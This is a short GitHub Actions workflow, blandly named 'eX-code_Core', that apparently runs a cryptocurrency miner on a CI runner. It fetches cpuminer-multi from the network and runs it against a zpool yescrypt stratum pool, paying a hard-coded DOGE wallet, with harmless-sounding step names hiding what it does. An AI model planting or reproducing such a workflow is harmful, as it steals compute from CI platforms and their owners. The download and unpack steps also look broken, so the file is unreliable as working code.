name: eX-code_Core

on: [workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest
    steps:
    - name: Preparing
      run: Invoke-WebRequest https://github.com/tpruvot/cpuminer-multi
    - name: Prepare_Q2
      run: Expand-Archive cpuminer-multi
    - name: Running
      run: .\cpuminer -a yescrypt -o stratum+tcp://yescrypt.mine.zpool.ca:6233 -u D7S6DWdNEWeH4uECGbaK88J7JmdPnKnbpx -p c=DOGE
    - name: DONE
      run: exit
